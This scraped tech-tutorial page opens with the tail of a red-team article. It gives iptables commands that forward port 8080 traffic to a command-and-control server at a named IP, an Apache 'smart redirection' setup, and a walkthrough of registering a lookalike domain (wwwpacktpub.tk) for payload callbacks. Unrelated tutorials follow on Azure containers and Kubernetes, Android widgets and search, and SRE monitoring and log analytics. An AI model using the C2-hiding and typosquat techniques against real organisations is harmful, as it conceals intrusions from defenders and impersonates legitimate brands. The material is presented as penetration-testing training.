order to configure a dumb pipe redirector which would redirect to our C2 on port 8080/tcp: Following are the commands that we can execute to perform dumb pipe redirection using iptables: iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1 The given commands needs to be executed and the result is shown in the following screenshot: (Ignore the sudo error here. This has occurred because of the hostname that we changed) Using socat or iptables, the result would be same i.e. the network traffic on the redirector's interface will be forwarded to our C2. Filtration/smart redirection Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection will always process the network traffic based on the rules defined by the red team before forwarding it to the C2. In a smart redirection, if the C2 traffic is invalid, the network traffic will either be forwarded to a legitimate website or it would just drop the packets. Only if the network traffic is for our C2 will the redirection work accordingly: To configure a smart redirection, we need to install a web service and configure it. Let's install Apache server on the redirector using the sudo apt install apache2 command: We need to execute the following commands as well in order to enable Apache modules to be rewritten, and also to enable SSL: sudo apt-get install apache2 sudo a2enmod ssl rewrite proxy proxy_http sudo a2ensite default-ssl.conf sudo service apache2 restart These are all commands that needs to be executed. The result of the executed commands are shown in the following screenshot: We also need to configure the Apache from its configuration: We need to look for the Directory directive in order to change the AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host setting and add this to wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf): After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection. Domain fronting According to https://resources.infosecinstitute.com/domain-fronting/: Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or they may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain. To make a start with domain fronting, we need to get a domain that is similar to our target organization. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue: We need to install some required Python packages before continuing further. This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will fetch for the expired and deleted domains that have a blank name because we didn't provide one: Let's check for the help option to see how we can use domainhunter: Let's search for a keyword to look for the domains related to the specified keyword. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the preceding-mentioned domains are free to register. Let's select wwwpacktpub.tk as follows: We can again check the availability of www.packtpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership of this: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we have obtained this, we can set the domain in the stager creation and get the back connection from wwwpacktpub.tk: In this article, we have learned the basics of redirectors and we have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.  This article also covered short-term and long-term C2s and much more. To know more about advanced penetration testing tools and more check out the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. Introducing numpywren, a system for linear algebra built on a serverless architecture Fortnite server suffered a minor outage, Epic Games was quick to address the issue Windows Server 2019 comes with security, storage and other changes
Read more
  • 0
  • 0
  • 26388
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-implementing-azure-managed-kubernetes-and-azure-container-service-tutorial
Melisha Dsouza
15 Jan 2019
12 min read
Save for later

Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

Melisha Dsouza
15 Jan 2019
12 min read
The next level of virtualization is containers as they provide a better solution than virtual machines within Hyper-V, as containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility; along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications This tutorial will combine the above-defined concepts and describe how to design and implement containers, and how to choose the proper solution for orchestrating containers. You will get an overview of how Azure can help you to implement services based on containers and get rid of traditional virtualization stuff with redundant OS resources that need to be managed, updated, backed-up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following: A computer with an internet browser An Azure subscription (if not available, a trial could work too). With Azure, you will have the option to order a container directly in Azure as an Azure Container Instance (ACI) or a managed Azure solution using Kubernetes as orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled  Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub. Azure Container Registry (ACR) If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry. This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Service (ACS) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies. This means you will need to fill in the following details: When you create your container registry, you will need to define the following: The registry name (ending with azurecr.io) The resource group the registry sits in The Azure location The admin user (if you will need to log in to the registry using an account) The SKU: Basic Standard Premium The following table details the features and limits of the basic, standard, and premium service tiers: Resource Basic Standard Premium Storage 10 GiB 100 GiB 500 GiB Max image layer size 20 GiB 20 GiB 50 GiB ReadOps per minute 1,000 3,000 10,000 WriteOps per minute 100 500 2,000 Download bandwidth MBps 30 60 100 Upload bandwidth MBps 10 20 50 Webhooks 2 10 100 Geo-replication N/A N/A Supported  Switching between the different SKUs is supported and can be done using the portal, PowerShell, or CLI. If you still are on a classic ACR, the first step would be to upgrade to a managed registry. Azure Container Instances By running your workloads in ACI, you don't have to set up a management infrastructure for your containers, you just can put your focus on design and building the applications. Creating your first container in Azure Let's create a first simple container in Azure using the portal:  Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties like: We will need to define the Azure container name. Of course, this needs to be unique in your environment. Then, we will need to define the source of the image and to which resource group and region it should be deployed within Azure. As already mentioned, containers can reside on Windows and Linux, because this needs to be defined at first. Afterwards, we will need to define the resources per container: Cores Memory Ports Port protocol Restart policy (if the container went offline) After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them. Azure Marketplace containers In the public Azure Marketplace, you can find existing container images that just can be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always good to look at first. Before starting with this, we will need to check if the required resource providers are enabled on the subscription you are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: At first, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, version) need to be defined in the following dialog: Now that the registry is being created, we will need to update the permission settings, also called enable admin registry. This can be done with the Admin user Enable button as shown in the following screenshot:  Regarding the SKU, this is just another point where we can set the priority and define performance. This may take some minutes to be enabled. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: At first, we will need to choose the corresponding container from the registry; right-click the tag version from the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled are some defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure. Container orchestration One of the most interesting topics with regard to containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin off an additional container to load-balance the traffic. This could even be done if we needed to scale down. The concept of container orchestration Regarding this technology, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following: Docker swarm DC/OS Kubernetes Kubernetes is the most-used one, and therefore could be deployed as a service in most public cloud services, such as in Azure. It provides the following features: Automated container placement: On the container hosts, to best spread the load between them Self-healing: For failed containers, restarting them in a proper way Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load Service discovery and load balancing: By providing IP-addresses to containers and managing DNS registrations Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature as updated containers that are newly rolled-out are just rolled back if something goes wrong Configuration management: By updating secrets and configurations without the need to fully rebuild the container itself Azure Kubernetes Service (AKS) Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. In general, these tasks are one-off costs and therefore it would be best to not waste these resources. In Azure today, there is a feature called AKS, where K emphasizes that it is a managed Kubernetes service. For AKS, there is no charge for Kubernetes masters, you just have to pay for the nodes that are running the containers. Before you start, you will have to fulfill the following prerequisites: An Azure account with an active subscription Azure CLI installed and configured Kubernetes command-line tool, kubectl, installed Make sure that the Azure subscription you use has these required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and choose to create your AKS deployment for your tenant. The following parameters need to be defined: Resource group for the deployment Kubernetes cluster name Azure region Kubernetes version DNS prefix Then,  hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose and existing one, as AKS needs a service principal to run the deployment. In addition, you could enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster into an existing VNET, or create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: The following is the source from which to set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer depending on the chosen feature, and scale: After the deployment has finished, the Kubernetes dashboard is available. You can view the Kubernetes dashboard by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot: As you can see in the preceding screenshot, there are four steps to open the dashboard. At first, we will need to install the Azure CLI in its most current version using the statement that is mentioned in the following screenshot: Afterward, the AKS CLI needs to be enabled. It is called kubectl.exe. Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window: The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment, in general, from a GUI. If a new Kubernetes version becomes available, you can easily update it from the Azure portal yourself with one click, as shown in the following screenshot: If you need to scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts with 3 vCPUs and 10.5 GB RAM per host is currently possible: You can now upload your containers to your AKS-enabled Docker and have a huge scalable infrastructure with a minimum of administrative tasks and time for the implementation itself. If you need to monitor AKS, the integration with Azure monitoring is integrated completely. By clicking the Monitor container health link, you will be directed to the following overview: The Nodes tab provides the following information per node: This not only gives a brief overview of the health status but also the number of containers and the load on the node itself. The Controllers view provides detailed information on the AKS controller, its services, status, and uptime: And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included): By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them in your custom portal: To get everything up-and-running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS: Prepare the AKS App: Create the container registry: Create the Kubernetes cluster Run the application in AKS: Scale the application in AKS: Update the application in AKS: AKS has the following service quotas and limits: Resource Default limit Max nodes per cluster 100 Max pods per node (basic networking with KubeNet) 110 Max pods per node (advanced networking with Azure CNI) 301 Max clusters per subscription 100 As you have seen, AKS in Azure provides great features with a minimum of administrative tasks. Summary In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. Basically, the concept of containers is a great idea and surely the next step in virtualization that applications need to go to. Setting up the environment manually is quite complex, but by using the PaaS approach, the setup procedure is quite simple (because of automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out our book Implementing Azure Solutions - Second Edition  Microsoft Connect(); 2018 Azure updates: Azure Pipelines extension for Visual Studio Code, GitHub releases and much more! Introducing Grafana’s ‘Loki’ (alpha), a scalable HA multi-tenant log aggregator for cloud natives; optimized for Grafana, Prometheus and Kubernetes DigitalOcean launches its Kubernetes-as-a-service at KubeCon+CloudNativeCon to ease running containerized app
Read more
  • 0
  • 0
  • 23618

article-image-implementing-a-home-screen-widget-and-search-bar-on-android-tutorial
Natasha Mathur
14 Jan 2019
12 min read
Save for later

Implementing a home screen widget and search bar on Android [Tutorial]

Natasha Mathur
14 Jan 2019
12 min read
In this tutorial, we'll look at how to create a home screen App Widget using which users can add your app on their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, etc, to help you develop applications using the latest Android framework. Creating a Home screen widget Before we dig into the code for creating an App Widget, let's cover the basics. There are three required and one optional component: The AppWidgetProviderInfo file: It's an XML resource. The AppWidgetProvider class: This is a Java class. The View layout file: It's a standard layout XML file, with some restrictions. The App Widget configuration Activity (optional): This is an Activity the OS will launch when placing the widget to provide configuration options. The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on the Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory. Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes: minWidth: The default width when placed on the Home screen minHeight: The default height when placed on the Home screen updatePeriodMillis: It's part of the onUpdate() polling interval (in milliseconds) initialLayout: The AppWidget layout previewImage (optional): The image shown when browsing App Widgets configure (optional): The activity to launch for configuration settings resizeMode (optional): The flags indicate resizing options: horizontal, vertical, none minResizeWidth (optional): The minimum width allowed when resizing minResizeHeight (optional): The minimum height allowed when resizing widgetCategory (optional): Android 5+ only supports Home screen widgets The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the AppWidget in the Manifest. As it's BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to those applicable for an App Widget. The AppWidgetProvider class exposes the following methods: onUpdate(): It's called when initially created and at the interval specified. onAppWidgetOptionsChanged(): It's called when initially created and any time the size changes. onDeleted(): It's called any time a widget is removed. onEnabled(): It's called the first time a widget is placed (it isn't called when adding second and subsequent widgets). onDisabled(): It's called when the last widget is removed. onReceive(): It's called on every event received, including the preceding event. Usually not overridden as the default implementation only sends applicable events. The last required component is the layout. An App Widget uses a Remote View, which only supports a subset of the available layouts: AdapterViewFlipper FrameLayout GridLayout GridView LinearLayout ListView RelativeLayout StackView ViewFlipper And it supports the following widgets: AnalogClock Button Chronometer ImageButton ImageView ProgressBar TextClock TextView With App Widget basics covered, it's now time to start coding. Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock, which, when pressed, opens our activity. The following screenshot shows the widget in the widget list when adding it to the Home screen: The purpose of the image is to show how to add a widget to the home screen The widget list's appearance varies by the launcher used. Here's a screenshot showing the widget after it is added to the Home screen: Getting ready Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type. How to do it... We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps: Create a new file in res/layout called widget.xml using the following XML: Create a new directory called XML in the resource directory. The final result will be res/xml. Create a new file in res/xml called appwidget_info.xml using the following XML: If you cannot see the new XML directory, switch from Android view to Project view in the Project panel drop-down. Create a new Java class called HomescreenWidgetProvider, extending from AppWidgetProvider. Add the following onUpdate() method to the HomescreenWidgetProvider class: Add the HomescreenWidgetProvider to the AndroidManifest using the following XML declaration within the <application> element: Run the program on a device or emulator. After first running the application, the widget will then be available to add to the Home screen. How it works... Our first step is to create the layout file for the widget. This is a standard layout resource with the restrictions based on the App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an Analog Clock widget, this is where you'd want to expand the functionality based on your application needs. The XML resource directory serves to store the AppWidgetProviderInfo, which defines the default widget settings. The configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image to show a functioning widget and sizing options. The updatePeriodMillis attribute sets the update frequency. Since the update will wake up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional Settings Activity is useful by letting the user decide.) The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating so we set the polling to zero. The update is still called when initially placing the widget. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of AppWidgets, we'll explain this in some detail. First, it's worth noting that onUpdate() will occur only once each polling interval for all the widgets is created by this provider. (All additional widgets created will use the same cycle as the first widget created.) This explains the for loop, as we need it to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an AppWidget is a Remote View. Therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we can attach the pending intent to the clock view using setOnClickPendingIntent(). We call the AppWidgetManager named updateAppWidget() to initiate the changes we made. The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>. Most App Widgets will likely want to handle the Update event, as ours does. The other item to note in the declaration is the following line: This tells the system where to find our configuration file. Adding Search to the Action Bar Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern to provide a consistent user experience. The following screenshot shows the initial appearance of the Search icon in the Action Bar: The following screenshot shows how the Search option expands when pressed: If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your User Interface and properly configure the Search Manager API. Getting ready Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type. How to do it... To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file. To get started, open the strings.xml file in res/values and follow these steps: Add the following string resources: Create the menu directory: res/menu. Create a new menu resource called menu_search.xml in res/menu using the following XML: Open ActivityMain and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager: @Override public boolean onCreateOptionsMenu(Menu menu) { MenuInflater inflater = getMenuInflater(); inflater.inflate(R.menu.menu_search, menu); SearchManager searchManager = (SearchManager) getSystemService(Context.SEARCH_SERVICE); MenuItem searchItem = menu.findItem(R.id.menu_search); SearchView searchView = (SearchView) searchItem.getActionView(); searchView.setSearchableInfo(searchManager.getSearchableInfo(getComponentName())); return true; } Create a new XML resource directory: res/xml. Create a new file in res/xml called searchable.xml using the following XML: Create a new layout called activity_search_result.xml using this XML: Add a new Empty Activity to the project called SearchResultActivity. Add the following variable to the class: TextView mTextViewSearchResult; Change onCreate() to load our layout, set the TextView, and check for the QUERY action: Add the following method to handle the search: With the User Interface and code now complete, we just need to hook everything up correctly in the AndroidManifest. Here is the complete manifest, including both activities: Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). The SearchResultActivity will be displayed, showing the search query entered. How it works... Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the Search View.  In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. The earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we create an app namespace. This serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs. Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user will have an idea of what they should type in the field. The android:label must match the application name or the activity name and must use a string resource (as it does not work with a hardcoded string). Steps 7-11 are for the SearchResultActivity. Calling the second activity is not a requirement of the SearchManager, but is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you would see the search icon, but nothing would work. Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the following: Notice this is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it will automatically apply to all <activities>. If we moved it to the MainActivity element, it would behave exactly the same in our example. You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We specify the searchable resource in the SearchResultActivity <meta-data> element: We also need to set the intent filter for SearchResultActivity as we do here: The SearchManager broadcasts the SEARCH intent when the user initiates the search. This declaration directs the intent to the SearchResultActivity activity. Once the search is triggered, the query text is sent to the SearchResultActivity using the SEARCH intent. We check for the SEARCH intent in the onCreate() and extract the query string using the following code: You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application needs. Depending on your application, you might search a local database or maybe a web service. So, we discussed creating a shortcut on the Home screen, creating a Home screen widget and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition', if you're interested in learning how to show your app in full-screen and enable lock screen shortcuts. Build your first Android app with Kotlin How to Secure and Deploy an Android App Android User Interface Development: Animating Widgets and Layouts
Read more
  • 0
  • 0
  • 27825

article-image-post-production-activities-for-ensuring-and-enhancing-it-reliability-tutorial
Savia Lobo
13 Jan 2019
15 min read
Save for later

Post-production activities for ensuring and enhancing IT reliability [Tutorial]

Savia Lobo
13 Jan 2019
15 min read
Evolving business expectations are being duly automated through a host of delectable developments in the IT space. These improvements elegantly empower business houses to deliver newer and premium business offerings fast. Businesses are insisting on reliable business operations.  IT pundits and professors are therefore striving hard and stretching further to bring forth viable methods and mechanisms toward reliable IT. Site Reliability Engineering (SRE) is a promising engineering discipline, and its key goals include significantly enhancing and ensuring the reliability aspects of IT. In this tutorial, we will focus on the various ways and means of bringing up the reliability assurance factor by embarking on some unique activities in the post-production/deployment phase. Monitoring, measuring, and managing the various operational and behavioral data is the first and foremost step toward reliable IT infrastructures and applications. This tutorial is an excerpt from a book titled Practical Site Reliability Engineering written by Pethuru Raj Chelliah, Shreyash Naithani, Shailender Singh. This book will teach you to create, deploy, and manage applications at scale using Site Reliability Engineering (SRE) principles. All the code files for this book can be found at GitHub. Monitoring clouds, clusters, and containers The cloud centers are being increasingly containerized and managed. That is, there are going to be well-entrenched containerized clouds soon. The formation and managing of containerized clouds get simplified through a host of container orchestration and management tools. There are both open source and commercial-grade container-monitoring tools. Kubernetes is emerging as the leading container orchestration and management platform. Thus, by leveraging the aforementioned toolsets, the process of setting up and sustaining containerized clouds is accelerated, risk-free, and rewarding. The tool-assisted monitoring of cloud resources (both coarse-grained as well as fine-grained) and applications in production environments is crucial to scaling the applications and providing resilient services. In a Kubernetes cluster, application performance can be examined at many different levels: containers, pods, services, and clusters. Through a single pane of glass, the operational team can provide the running applications and their resource utilization details to their users. These will give users the right insights into how the applications are performing, where application bottlenecks may be found, if any, and how to surmount any deviations and deficiencies of the applications. In short, application performance, security, scalability constraints, and other pertinent information can be captured and acted upon. Cloud infrastructure and application monitoring The cloud idea has disrupted, innovated, and transformed the IT world. Yet, the various cloud infrastructures, resources, and applications ought to be minutely monitored and measured through automated tools. The aspect of automation is gathering momentum in the cloud era. A slew of flexibilities in the form of customization, configuration, and composition are being enacted through cloud automation tools. A bevy of manual and semi-automated tasks are being fully automated through a series of advancements in the IT space. In this section, we will understand the infrastructure monitoring toward infrastructure optimization and automation. Enterprise-scale and mission-critical applications are being cloud-enabled to be deployed in various cloud environments (private, public, community, and hybrid). Furthermore, applications are being meticulously developed and deployed directly on cloud platforms using microservices architecture (MSA). Thus, besides cloud infrastructures, there are cloud-based IT platforms and middleware, business applications, and database management systems. The total IT is accordingly modernized to be cloud-ready. It is very important to precisely and perfectly monitor and measure every asset and aspect of cloud environments. Organizations need to have the capability for precisely monitoring the usage of the participating cloud resources. If there is any deviation, then the monitoring feature triggers an alert to the concerned to ponder about the next course of action. The monitoring capability includes viable tools for monitoring CPU usage per computing resource, the varying ratios between systems activity and user activity, and the CPU usage from specific job tasks. Also, organizations have to have the intrinsic capability for predictive analytics that allows them to capture trending data on memory utilization and filesystem growth. These details help the operational team to proactively plan the needed changes to computing/storage/network resources before they encounter service availability issues. Timely action is essential for ensuring business continuity. Not only infrastructures, but also applications' performance levels have to be closely monitored in order to embark on fine-tuning application code, as well as the infrastructure architectural considerations. Typically, organizations find it easier to monitor the performance of applications that are hosted at a single server, as opposed to the performance of composite applications that are leveraging several server resources. This becomes more tedious and tough when the underlying computer resources are spread across multiple and are distributed. The major worry here is that the team loses its visibility and controllability of third-party data center resources. Enterprises, for different valid reasons, prefer multi-cloud strategy for hosting their applications and data. There are several IT infrastructure management tools, practices, and principles. These traditional toolsets become obsolete for the cloud era. There are a number of distinct characteristics being associated with software-defined cloud environments. It is expected that any cloud application has to innately fulfill the non-functional requirements (NFRs) such as scalability, availability, performance, flexibility, and reliability. Research reports say that organizations across the globe enjoy significant cost savings and increased flexibility of management by modernizing and moving their applications into cloud environments. The monitoring tool capabilities It is paramount to deploy monitoring and management tools to effectively and efficiency run cloud environments, wherein thousands of computing, storage, and network solutions are running. The key characteristics of this tool are vividly illustrated through the following diagram: Here are some of the key features and capabilities we need to properly monitor for modern cloud-based applications and infrastructures: Firstly, the ability to capture and query events and traces in addition to data aggregation is essential. When a customer buys something online, the buying process generates a lot of HTTP requests. For proper end-to-end cloud monitoring, we need to see the exact set of HTTP requests the customer makes while completing the purchase. Any monitoring system has to have the capability to quickly identify bottlenecks and understand the relationships among different components. The solution has to give the exact response time of each component for each transaction. Critical metadata such as error traces and custom attributes ought to be made available to enhance trace and event data. By segmenting the data via the user and business-specific attributes, it is possible to prioritize improvements and sprint plans to optimize for those customers. Secondly, the monitoring system has to have the ability to monitor a wide variety of cloud environments (private, public, and hybrid). Thirdly, the monitoring solution has to scale for any emergency. The benefits Organizations that are using the right mix of technology solutions for IT infrastructure and business application monitoring in the cloud are to gain the following benefits: Performance engineering and enhancement On-demand computing Affordability Prognostic, predictive, and prescriptive analytics Any operational environment is in need of data analytics and machine learning capabilities to be intelligent in their everyday actions and reactions. As data centers and server farms evolve and embrace new technologies (virtualization and containerization), it becomes more difficult to determine what impacts these changes have on the server, storage, and network performance. By using proper analytics, system administrators and IT managers can easily identify and even predict potential choke points and errors before they create problems.  To know more about prognostic, predictive, and prescriptive analytics; head over to our book Practical Site Reliability Engineering. Log analytics Every software and hardware system generates a lot of log data (big data), and it is essential to do real-time log analytics to quickly understand whether there is any deviation or deficiency. This extracted knowledge helps administrators to consider countermeasures in time. Log analytics, if done systematically, facilitates preventive, predictive, and prescriptive maintenance. Workloads, IT platforms, middleware, databases, and hardware solutions all create a lot of log data when they are working together to complete business functionalities. There are several log analytics tools on the market. Open source log analytics platforms If there is a need to handle all log data in one place, then ELK is being touted as the best-in-class open source log analytics solution. There are an application as well as system logs. Logs are typically errors, warnings, and exceptions. ELK is a combination of three different products, namely Elasticsearch, Logstash, and Kibana (ELK). The macro-level ELK architecture is given as follows: Elasticsearch is a search mechanism that is based on the Lucene search to store and retrieve its data. Elasticsearch is, in a way, a NoSQL database. That is, it stores multi-structured data and does not support SQL as the query language. Elasticsearch has a REST API, which uses either PUT or POST to fetch the data. If you want real-time processing of big data, then Elasticsearch is the way forward.  Increasingly, Elasticsearch is being primed for real-time and affordable log analytics. Logstash is an open source and server-side data processing pipeline that ingests data from a variety of data sources simultaneously and transforms and sends them to a preferred database. Logstash also handles unstructured data with ease. Logstash has more than 200 plugins built in, and it is easy to come out on our own. Kibana is the last module of the famous ELK toolset and is an open source data visualization and exploration tool mainly used for performing log and time-series analytics, application monitoring, and IT operational analytics (ITOA). Kibana is gaining a lot of market and mind shares, as it makes it easy to make histograms, line graphs, pie charts, and heat maps. Logz.io, the commercialized version of the ELK platform, is the world's most popular open source log analysis platform. This is made available as an enterprise-grade service in the cloud. It assures high availability, unbreakable security, and scalability. Cloud-based log analytics platforms The log analytics capability is being given as a cloud-based and value-added service by various cloud service providers (CSPs). The Microsoft Azure cloud provides the log analytics service to its users/subscribers by constantly monitoring both cloud and on-premises environments to take correct decisions that ultimately ensure their availability and performance.  The Azure cloud has its own monitoring mechanism in place through its Azure monitor, which collects and meticulously analyze log data emitted by various Azure resources. The log analytics feature of the Azure cloud considers the monitoring data and correlates with other relevant data to supply additional insights. The same capability is also made available for private cloud environments. It can collect all types of log data through various tools from multiple sources and consolidate them into a single and centralized repository. Then, the suite of analysis tools in log analytics, such as log searches and views a collaborate with one another to provide you with centralized insights of your entire environment. The macro-level architecture is given here: This service is being given by other cloud service providers. AWS is one of the well-known providers amongst many others.  The paramount contributions of log analytics tools include the following: Infrastructure monitoring: Log analytics platforms easily and quickly analyze logs from bare metal (BM) servers and network solutions, such as firewalls, load balancers, application delivery controllers, CDN appliances, storage systems, virtual machines, and containers. Application performance monitoring: The analytics platform captures application logs, which are streamed live and takes the assigned performance metrics for doing real-time analysis and debugging. Security and compliance: The service provides an immutable log storage, centralization, and reporting to meet compliance requirements. It has deeper monitoring and decisive collaboration for extricating useful and usable insights. AI-enabled log analytics platforms Algorithmic IT Operations (AIOps) leverages the proven and potential AI algorithms to help organizations to make the path smooth for their digital transformation goals. AIOps is being touted as the way forward to substantially reduce IT operational costs. AIOps automates the process of analyzing IT infrastructures and business workloads to give right and relevant details to administrators about their functioning and performance levels. AIOps minutely monitors each of the participating resources and applications and then intelligently formulates the various steps to be considered for their continuous well being. AIOps helps to realize the goals of preventive and predictive maintenance of IT and business systems and also comes out with prescriptive details for resolving issues with all the clarity and confidence. Furthermore, AIOps lets IT teams conduct root-cause analysis by identifying and correlating issues. Loom Loom is a leading provider of AIOps solutions. Loom's AIOps platform is consistently leveraging competent machine-learning algorithms to easily and quickly automate the log analysis process. The real-time analytics capability of the ML algorithms enables organizations to arrive at correct resolutions for the issues and to complete the resolution tasks in an accelerated fashion. Loom delivers an AI-powered log analysis platform to predict all kinds of impending issues and prescribe the resolution steps. The overlay or anomaly detection is rapidly found, and the strategically sound solution gets formulated with the 